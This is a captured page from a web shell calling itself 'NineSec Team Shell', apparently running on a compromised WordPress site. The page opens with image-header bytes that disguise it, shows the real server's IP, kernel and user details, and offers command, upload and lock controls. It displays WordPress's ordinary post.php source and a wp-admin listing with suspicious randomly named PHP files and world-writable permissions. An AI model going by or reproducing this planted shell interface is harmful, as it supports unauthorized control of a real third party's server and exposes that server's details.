�����JFIF��������(ICC_PROFILE���������mntrRGB XYZ ������������acsp�������������������������������������-��������������������������������������������������� desc�������trXYZ��d���gXYZ��x���bXYZ������rTRC������(gTRC������(bTRC������(wtpt������cprt������ NineSec Team Shell
NineSec Team Shell
Server IP : 51.38.211.120  /  Your IP : 216.73.216.188
Web Server : Apache
System : Linux bob 5.15.85-1-pve #1 SMP PVE 5.15.85-1 (2023-02-01T00:00Z) x86_64
User : readytorun ( 1067)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /home/readytorun/domains/demo.readytorun.it/public_html/wp-admin/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /home/readytorun/domains/demo.readytorun.it/public_html/wp-admin/post.php
<?php
/**
 * Edit post administration panel.
 *
 * Manage Post actions: post, edit, delete, etc.
 *
 * @package WordPress
 * @subpackage Administration
 */

/** WordPress Administration Bootstrap */
require_once __DIR__ . '/admin.php';

$parent_file  = 'edit.php';
$submenu_file = 'edit.php';

wp_reset_vars( array( 'action' ) );

if ( isset( $_GET['post'] ) && isset( $_POST['post_ID'] ) && (int) $_GET['post'] !== (int) $_POST['post_ID'] ) {
	wp_die( __( 'A post ID mismatch has been detected.' ), __( 'Sorry, you are not allowed to edit this item.' ), 400 );
} elseif ( isset( $_GET['post'] ) ) {
	$post_id = (int) $_GET['post'];
} elseif ( isset( $_POST['post_ID'] ) ) {
	$post_id = (int) $_POST['post_ID'];
} else {
	$post_id = 0;
}
$post_ID = $post_id;

/**
 * @global string  $post_type
 * @global object  $post_type_object
 * @global WP_Post $post             Global post object.
 */
global $post_type, $post_type_object, $post;

if ( $post_id ) {
	$post = get_post( $post_id );
}

if ( $post ) {
	$post_type        = $post->post_type;
	$post_type_object = get_post_type_object( $post_type );
}

if ( isset( $_POST['post_type'] ) && $post && $post_type !== $_POST['post_type'] ) {
	wp_die( __( 'A post type mismatch has been detected.' ), __( 'Sorry, you are not allowed to edit this item.' ), 400 );
}

if ( isset( $_POST['deletepost'] ) ) {
	$action = 'delete';
} elseif ( isset( $_POST['wp-preview'] ) && 'dopreview' === $_POST['wp-preview'] ) {
	$action = 'preview';
}

$sendback = wp_get_referer();
if ( ! $sendback ||
	str_contains( $sendback, 'post.php' ) ||
	str_contains( $sendback, 'post-new.php' ) ) {
	if ( 'attachment' === $post_type ) {
		$sendback = admin_url( 'upload.php' );
	} else {
		$sendback = admin_url( 'edit.php' );
		if ( ! empty( $post_type ) ) {
			$sendback = add_query_arg( 'post_type', $post_type, $sendback );
		}
	}
} else {
	$sendback = remove_query_arg( array( 'trashed', 'untrashed', 'deleted', 'ids' ), $sendback );
}

switch ( $action ) {
	case 'post-quickdraft-save':
		// Check nonce and capabilities.
		$nonce     = $_REQUEST['_wpnonce'];
		$error_msg = false;

		// For output of the Quick Draft dashboard widget.
		require_once ABSPATH . 'wp-admin/includes/dashboard.php';

		if ( ! wp_verify_nonce( $nonce, 'add-post' ) ) {
			$error_msg = __( 'Unable to submit this form, please refresh and try again.' );
		}

		if ( ! current_user_can( get_post_type_object( 'post' )->cap->create_posts ) ) {
			exit;
		}

		if ( $error_msg ) {
			return wp_dashboard_quick_press( $error_msg );
		}

		$post = get_post( $_REQUEST['post_ID'] );
		check_admin_referer( 'add-' . $post->post_type );

		$_POST['comment_status'] = get_default_comment_status( $post->post_type );
		$_POST['ping_status']    = get_default_comment_status( $post->post_type, 'pingback' );

		// Wrap Quick Draft content in the Paragraph block.
		if ( ! str_contains( $_POST['content'], '<!-- wp:paragraph -->' ) ) {
			$_POST['content'] = sprintf(
				'<!-- wp:paragraph -->%s<!-- /wp:paragraph -->',
				str_replace( array( "\r\n", "\r", "\n" ), '<br />', $_POST['content'] )
			);
		}

		edit_post();
		wp_dashboard_quick_press();
		exit;

	case 'postajaxpost':
	case 'post':
		check_admin_referer( 'add-' . $post_type );
		$post_id = 'postajaxpost' === $action ? edit_post() : write_post();
		redirect_post( $post_id );
		exit;

	case 'edit':
		$editing = true;

		if ( empty( $post_id ) ) {
			wp_redirect( admin_url( 'post.php' ) );
			exit;
		}

		if ( ! $post ) {
			wp_die( __( 'You attempted to edit an item that does not exist. Perhaps it was deleted?' ) );
		}

		if ( ! $post_type_object ) {
			wp_die( __( 'Invalid post type.' ) );
		}

		if ( ! in_array( $typenow, get_post_types( array( 'show_ui' => true ) ), true ) ) {
			wp_die( __( 'Sorry, you are not allowed to edit posts in this post type.' ) );
		}

		if ( ! current_user_can( 'edit_post', $post_id ) ) {
			wp_die( __( 'Sorry, you are not allowed to edit this item.' ) );
		}

		if ( 'trash' === $post->post_status ) {
			wp_die( __( 'You cannot edit this item because it is in the Trash. Please restore it and try again.' ) );
		}

		if ( ! empty( $_GET['get-post-lock'] ) ) {
			check_admin_referer( 'lock-post_' . $post_id );
			wp_set_post_lock( $post_id );
			wp_redirect( get_edit_post_link( $post_id, 'url' ) );
			exit;
		}

		$post_type = $post->post_type;
		if ( 'post' === $post_type ) {
			$parent_file   = 'edit.php';
			$submenu_file  = 'edit.php';
			$post_new_file = 'post-new.php';
		} elseif ( 'attachment' === $post_type ) {
			$parent_file   = 'upload.php';
			$submenu_file  = 'upload.php';
			$post_new_file = 'media-new.php';
		} else {
			if ( isset( $post_type_object ) && $post_type_object->show_in_menu && true !== $post_type_object->show_in_menu ) {
				$parent_file = $post_type_object->show_in_menu;
			} else {
				$parent_file = "edit.php?post_type=$post_type";
			}
			$submenu_file  = "edit.php?post_type=$post_type";
			$post_new_file = "post-new.php?post_type=$post_type";
		}

		$title = $post_type_object->labels->edit_item;

		/**
		 * Allows replacement of the editor.
		 *
		 * @since 4.9.0
		 *
		 * @param bool    $replace Whether to replace the editor. Default false.
		 * @param WP_Post $post    Post object.
		 */
		if ( true === apply_filters( 'replace_editor', false, $post ) ) {
			break;
		}

		if ( use_block_editor_for_post( $post ) ) {
			require ABSPATH . 'wp-admin/edit-form-blocks.php';
			break;
		}

		if ( ! wp_check_post_lock( $post->ID ) ) {
			$active_post_lock = wp_set_post_lock( $post->ID );

			if ( 'attachment' !== $post_type ) {
				wp_enqueue_script( 'autosave' );
			}
		}

		$post = get_post( $post_id, OBJECT, 'edit' );

		if ( post_type_supports( $post_type, 'comments' ) ) {
			wp_enqueue_script( 'admin-comments' );
			enqueue_comment_hotkeys_js();
		}

		require ABSPATH . 'wp-admin/edit-form-advanced.php';

		break;

	case 'editattachment':
		check_admin_referer( 'update-post_' . $post_id );

		// Don't let these be changed.
		unset( $_POST['guid'] );
		$_POST['post_type'] = 'attachment';

		// Update the thumbnail filename.
		$newmeta          = wp_get_attachment_metadata( $post_id, true );
		$newmeta['thumb'] = wp_basename( $_POST['thumb'] );

		wp_update_attachment_metadata( $post_id, $newmeta );

		// Intentional fall-through to trigger the edit_post() call.
	case 'editpost':
		check_admin_referer( 'update-post_' . $post_id );

		$post_id = edit_post();

		// Session cookie flag that the post was saved.
		if ( isset( $_COOKIE['wp-saving-post'] ) && $_COOKIE['wp-saving-post'] === $post_id . '-check' ) {
			setcookie( 'wp-saving-post', $post_id . '-saved', time() + DAY_IN_SECONDS, ADMIN_COOKIE_PATH, COOKIE_DOMAIN, is_ssl() );
		}

		redirect_post( $post_id ); // Send user on their way while we keep working.

		exit;

	case 'trash':
		check_admin_referer( 'trash-post_' . $post_id );

		if ( ! $post ) {
			wp_die( __( 'The item you are trying to move to the Trash no longer exists.' ) );
		}

		if ( ! $post_type_object ) {
			wp_die( __( 'Invalid post type.' ) );
		}

		if ( ! current_user_can( 'delete_post', $post_id ) ) {
			wp_die( __( 'Sorry, you are not allowed to move this item to the Trash.' ) );
		}

		$user_id = wp_check_post_lock( $post_id );
		if ( $user_id ) {
			$user = get_userdata( $user_id );
			/* translators: %s: User's display name. */
			wp_die( sprintf( __( 'You cannot move this item to the Trash. %s is currently editing.' ), $user->display_name ) );
		}

		if ( ! wp_trash_post( $post_id ) ) {
			wp_die( __( 'Error in moving the item to Trash.' ) );
		}

		wp_redirect(
			add_query_arg(
				array(
					'trashed' => 1,
					'ids'     => $post_id,
				),
				$sendback
			)
		);
		exit;

	case 'untrash':
		check_admin_referer( 'untrash-post_' . $post_id );

		if ( ! $post ) {
			wp_die( __( 'The item you are trying to restore from the Trash no longer exists.' ) );
		}

		if ( ! $post_type_object ) {
			wp_die( __( 'Invalid post type.' ) );
		}

		if ( ! current_user_can( 'delete_post', $post_id ) ) {
			wp_die( __( 'Sorry, you are not allowed to restore this item from the Trash.' ) );
		}

		if ( ! wp_untrash_post( $post_id ) ) {
			wp_die( __( 'Error in restoring the item from Trash.' ) );
		}

		$sendback = add_query_arg(
			array(
				'untrashed' => 1,
				'ids'       => $post_id,
			),
			$sendback
		);
		wp_redirect( $sendback );
		exit;

	case 'delete':
		check_admin_referer( 'delete-post_' . $post_id );

		if ( ! $post ) {
			wp_die( __( 'This item has already been deleted.' ) );
		}

		if ( ! $post_type_object ) {
			wp_die( __( 'Invalid post type.' ) );
		}

		if ( ! current_user_can( 'delete_post', $post_id ) ) {
			wp_die( __( 'Sorry, you are not allowed to delete this item.' ) );
		}

		if ( 'attachment' === $post->post_type ) {
			$force = ( ! MEDIA_TRASH );
			if ( ! wp_delete_attachment( $post_id, $force ) ) {
				wp_die( __( 'Error in deleting the attachment.' ) );
			}
		} else {
			if ( ! wp_delete_post( $post_id, true ) ) {
				wp_die( __( 'Error in deleting the item.' ) );
			}
		}

		wp_redirect( add_query_arg( 'deleted', 1, $sendback ) );
		exit;

	case 'preview':
		check_admin_referer( 'update-post_' . $post_id );

		$url = post_preview();

		wp_redirect( $url );
		exit;

	case 'toggle-custom-fields':
		check_admin_referer( 'toggle-custom-fields', 'toggle-custom-fields-nonce' );

		$current_user_id = get_current_user_id();
		if ( $current_user_id ) {
			$enable_custom_fields = (bool) get_user_meta( $current_user_id, 'enable_custom_fields', true );
			update_user_meta( $current_user_id, 'enable_custom_fields', ! $enable_custom_fields );
		}

		wp_safe_redirect( wp_get_referer() );
		exit;

	default:
		/**
		 * Fires for a given custom post action request.
		 *
		 * The dynamic portion of the hook name, `$action`, refers to the custom post action.
		 *
		 * @since 4.6.0
		 *
		 * @param int $post_id Post ID sent with the request.
		 */
		do_action( "post_action_{$action}", $post_id );

		wp_redirect( admin_url( 'edit.php' ) );
		exit;
} // End switch.

require_once ABSPATH . 'wp-admin/admin-footer.php';

NineSec Team - 2022
Name
Size
Last Modified
Owner
Permissions
Options
..
--
December 20 2025 8:53:19
readytorun
0755
configYDB
--
September 11 2024 5:18:57
readytorun
0755
css
--
September 11 2024 5:18:57
readytorun
0755
images
--
September 11 2024 5:19:31
readytorun
0755
includes
--
September 11 2024 5:18:57
readytorun
0755
js
--
September 11 2024 5:18:57
readytorun
0755
maint
--
January 15 2025 10:41:27
readytorun
0755
network
--
November 01 2025 8:15:37
readytorun
0755
user
--
September 11 2024 5:18:57
readytorun
0755
.htaccess
1.997 KB
October 24 2025 7:58:55
readytorun
0444
4shCpW.php
28.353 KB
October 22 2025 3:41:48
readytorun
0444
about.php
19.534 KB
January 31 2024 5:29:18
readytorun
0777
admin-ajax.php
4.826 KB
August 28 2023 5:01:56
readytorun
0777
admin-footer.php
2.757 KB
August 28 2023 5:01:55
readytorun
0777
admin-functions.php
0.396 KB
August 28 2023 5:01:55
readytorun
0777
admin-header.php
8.82 KB
August 28 2023 5:01:55
readytorun
0777
admin-post.php
1.999 KB
August 28 2023 5:01:56
readytorun
0777
admin.php
12.265 KB
August 28 2023 5:01:56
readytorun
0777
async-upload.php
4.677 KB
November 10 2023 1:05:53
readytorun
0777
authorize-application.php
10.093 KB
November 10 2023 1:05:53
readytorun
0777
click.php
144.795 KB
October 25 2021 1:04:15
readytorun
0777
comment.php
11.294 KB
November 10 2023 1:05:53
readytorun
0777
contribute.php
5.492 KB
November 10 2023 1:05:53
readytorun
0777
credits.php
3.675 KB
November 10 2023 1:05:53
readytorun
0777
custom-background.php
0.406 KB
August 28 2023 5:01:56
readytorun
0777
custom-header.php
0.416 KB
August 28 2023 5:01:56
readytorun
0777
customize.php
10.61 KB
August 28 2023 5:01:56
readytorun
0777
edit-comments.php
14.381 KB
November 10 2023 1:05:53
readytorun
0777
edit-form-advanced.php
28.629 KB
November 10 2023 1:05:53
readytorun
0777
edit-form-blocks.php
11.742 KB
November 10 2023 1:05:53
readytorun
0777
edit-form-comment.php
8.344 KB
August 28 2023 5:01:55
readytorun
0777
edit-link-form.php
6.213 KB
November 10 2023 1:05:53
readytorun
0777
edit-tag-form.php
10.452 KB
November 10 2023 1:05:53
readytorun
0777
edit-tags.php
21.91 KB
November 10 2023 1:05:53
readytorun
0777
edit.php
19.431 KB
November 10 2023 1:05:53
readytorun
0777
erase-personal-data.php
7.361 KB
November 10 2023 1:05:53
readytorun
0777
export-personal-data.php
7.759 KB
August 28 2023 5:01:56
readytorun
0777
export.php
11.015 KB
November 10 2023 1:05:53
readytorun
0777
freedoms.php
4.431 KB
November 10 2023 1:05:53
readytorun
0777
import.php
7.468 KB
November 10 2023 1:05:53
readytorun
0777
index.php
7.68 KB
November 10 2023 1:05:53
readytorun
0777
install-helper.php
6.798 KB
August 28 2023 5:01:55
readytorun
0777
install.php
17.091 KB
August 28 2023 5:01:55
readytorun
0777
link-add.php
0.725 KB
August 28 2023 5:01:55
readytorun
0777
link-manager.php
4.263 KB
November 10 2023 1:05:53
readytorun
0777
link-parse-opml.php
2.627 KB
August 28 2023 5:01:56
readytorun
0777
link.php
2.696 KB
November 10 2023 1:05:53
readytorun
0777
load-scripts.php
1.66 KB
August 28 2023 5:01:56
readytorun
0777
load-styles.php
2.564 KB
August 28 2023 5:01:55
readytorun
0777
media-new.php
3.185 KB
August 28 2023 5:01:56
readytorun
0777
media-upload.php
3.485 KB
November 10 2023 1:05:53
readytorun
0777
media.php
0.745 KB
August 28 2023 5:01:56
readytorun
0777
menu-header.php
9.836 KB
August 28 2023 5:01:55
readytorun
0777
menu.php
16.748 KB
November 10 2023 1:05:53
readytorun
0777
moderation.php
0.3 KB
August 28 2023 5:01:55
readytorun
0777
ms-admin.php
0.191 KB
August 28 2023 5:01:55
readytorun
0777
ms-delete-site.php
4.187 KB
August 28 2023 5:01:55
readytorun
0777
ms-edit.php
0.211 KB
August 28 2023 5:01:55
readytorun
0777
ms-options.php
0.218 KB
August 28 2023 5:01:55
readytorun
0777
ms-sites.php
0.21 KB
August 28 2023 5:01:56
readytorun
0777
ms-themes.php
0.212 KB
August 28 2023 5:01:56
readytorun
0777
ms-upgrade-network.php
0.214 KB
August 28 2023 5:01:56
readytorun
0777
ms-users.php
0.21 KB
August 28 2023 5:01:55
readytorun
0777
my-sites.php
4.744 KB
November 10 2023 1:05:53
readytorun
0777
nav-menus.php
47.764 KB
November 10 2023 1:05:53
readytorun
0777
network.php
5.354 KB
August 28 2023 5:01:56
readytorun
0777
options-discussion.php
15.577 KB
August 28 2023 5:01:56
readytorun
0777
options-general.php
16.789 KB
November 10 2023 1:05:53
readytorun
0777
options-head.php
0.48 KB
August 28 2023 5:01:55
readytorun
0777
options-media.php
6.353 KB
August 28 2023 5:01:56
readytorun
0777
options-permalink.php
21.123 KB
August 28 2023 5:01:55
readytorun
0777
options-privacy.php
9.971 KB
November 10 2023 1:05:53
readytorun
0777
options-reading.php
10.072 KB
November 10 2023 1:05:53
readytorun
0777
options-writing.php
9.056 KB
August 28 2023 5:01:56
readytorun
0777
options.php
13.305 KB
November 10 2023 1:05:53
readytorun
0777
pevmodzr.php
0 KB
April 30 2024 6:37:38
readytorun
0777
php.ini
0.103 KB
April 30 2024 2:11:54
readytorun
0777
plugin-editor.php
13.393 KB
November 10 2023 1:05:53
readytorun
0777
plugin-install.php
6.777 KB
August 28 2023 5:01:56
readytorun
0777
plugins.php
28.822 KB
November 10 2023 1:05:53
readytorun
0777
post-new.php
2.64 KB
August 28 2023 5:01:55
readytorun
0777
post.php
9.852 KB
August 28 2023 5:01:55
readytorun
0777
press-this.php
2.33 KB
August 28 2023 5:01:56
readytorun
0777
privacy-policy-guide.php
3.668 KB
November 10 2023 1:05:53
readytorun
0777
privacy.php
2.412 KB
November 10 2023 1:05:53
readytorun
0777
profile.php
0.276 KB
August 28 2023 5:01:56
readytorun
0777
revision.php
5.469 KB
November 10 2023 1:05:53
readytorun
0777
search.php
9.941 KB
August 21 2022 1:04:15
readytorun
0777
setup-config.php
17.326 KB
August 28 2023 5:01:56
readytorun
0777
site-editor.php
5.959 KB
November 10 2023 1:05:53
readytorun
0777
site-health-info.php
3.975 KB
November 10 2023 1:05:53
readytorun
0777
site-health.php
10.144 KB
November 10 2023 1:05:53
readytorun
0777
term.php
2.196 KB
August 28 2023 5:01:55
readytorun
0777
theme-editor.php
15.149 KB
November 10 2023 1:05:53
readytorun
0777
theme-install.php
23.351 KB
November 10 2023 1:05:53
readytorun
0777
themes.php
46.89 KB
November 10 2023 1:05:53
readytorun
0777
tools.php
3.432 KB
August 28 2023 5:01:56
readytorun
0777
update-core.php
45.2 KB
November 10 2023 1:05:53
readytorun
0777
update.php
12.785 KB
January 31 2024 5:29:18
readytorun
0777
upgrade-functions.php
0.333 KB
August 28 2023 5:01:55
readytorun
0777
upgrade.php
5.555 KB
November 10 2023 1:05:53
readytorun
0777
upload.php
14.842 KB
November 10 2023 1:05:53
readytorun
0777
user-edit.php
39.067 KB
November 10 2023 1:05:53
readytorun
0777
user-new.php
23.985 KB
November 10 2023 1:05:53
readytorun
0777
users.php
23.288 KB
November 10 2023 1:05:53
readytorun
0777
wdgwrdcx.php
0 KB
April 30 2024 6:34:46
readytorun
0777
widgets-form-blocks.php
4.395 KB
November 10 2023 1:05:53
readytorun
0777
widgets-form.php
19.175 KB
November 10 2023 1:05:53
readytorun
0777
widgets.php
1.086 KB
August 28 2023 5:01:55
readytorun
0777

NineSec Team - 2022